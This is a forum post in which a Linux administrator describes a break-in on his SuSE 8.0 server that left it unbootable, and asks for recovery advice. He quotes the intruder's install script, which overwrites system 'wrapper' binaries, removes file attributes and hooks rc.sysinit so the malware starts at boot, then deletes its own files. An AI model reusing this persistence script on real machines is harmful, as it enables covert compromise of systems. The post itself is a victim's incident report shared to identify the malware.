Unfortunately I left SuSE Linux 8.0 Professional Server open tonight. SuSE Firewall 2 was temporarely deactivated. At 2 PM somebody from outside managed to implantinate a virus (dir /mihai and files like /.mihai, /mihai.tgz, /mihai/inst etc.). At the same time /etc/rc.d/rc.sysinit was been over- written (with a call to wrapper) and the files /usr/bin/wrapper as well as /usr/sbin/wrapper have been overwritten with the code of /mihai. I'm not sure but it looks like other files have been affected as well (sendmail has gotten a date of tonight and is much larger than the original sendmail). Before I rebooted the server I removed /usr/bin/wrapper and /usr/sbin/wrapper. Now, the server will no longer boot. After mounting the file systems (reiserfs) the following messages appears: mounting local filesystems proc on /proctyp proc (rw) Then the server hangs. How can I get the server up again? It doesn't matter to me if I have to reinstall all software as long as I don't need to distroy my partitions and, more important, the file system on hda3, since I have a backup of all important config files and all datafiles on hda3. I tried to reinstall from CD, but this doesn't work too (options freely translated from German): - New Install Will create new partitions and overwirte my HD!?! - Update existing system Does not boot (same as normal boot from disk) - Start installes system Does not boot (same as normal boot from disk) What can I do? Any hints are welcome. This is how /mihai/inst looks like: --------------------------------------------------------------- #/bin/bash echo "Start Daemon" sleep 1 ./kill cp -f mihai /usr/bin/wrapper cp -f mihai /usr/sbin/wrapper sleep 1 wrapper chattr -AacdisSu /etc/rc.d/rc.sysinit echo >>/etc/rc.d/rc.sysinit "#Start Wrapper" echo >>/etc/rc.d/rc.sysinit wrapper sleep 1 rm -rf mihai.tgz rm -rf mihai echo "Done" --------------------------------------------------------------- Does anybody know this virus? Peter